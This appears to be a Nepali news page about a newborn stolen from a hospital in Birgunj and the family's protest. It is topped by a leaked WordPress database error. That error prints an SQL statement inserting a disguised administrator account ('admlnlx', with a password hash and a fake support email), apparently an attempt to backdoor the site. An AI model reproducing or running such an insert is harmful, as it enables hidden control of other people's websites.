WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIAo5NBe7zQ5rO0Wy13.Th33nPHPaO/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-09 01:58:14', '', 'admlnlx', 'admlnlx')
बीरगञ्ज, माघ २१-
बीरगञ्जको नारायणी उपक्षेत्रीय अस्पतालबाट एक नवजात शिशू चोरिएको भन्दै आफन्तजनले अस्पतालमा नाराबाजी गरिरहेका छन् । आज बिहान १० बजेर ४० मिनेटमा नर्मल डेलिभरीबाट जन्मिएको बच्चा करिब २ बजे हराएको बुवा मुकेश पासवानले बताए ।
सुत्केरी आशा देवीको हेरचाहको लागि वार्डमा रहेकी भाइ बुहारी खुश्वु देवीका अनुसार एक अपरिचित महिलाले छोरा खेलाउँदै लिएर बेपत्ता भएको बताइन् । अस्पतालको गेटमा सीसीटीभी जडान गरिएको भए पनि केही समयता बिग्रेको छ ।
अस्पताल प्रमुख चितरञ्जन साहले अस्पतालमा यस्तो घटना पहिलो पटक भएको भन्दै आफू आश्चर्यचकित भएको प्रतिक्रिया दिए । उनले घटना छानबिनको लागि लागिपरेको बताए ।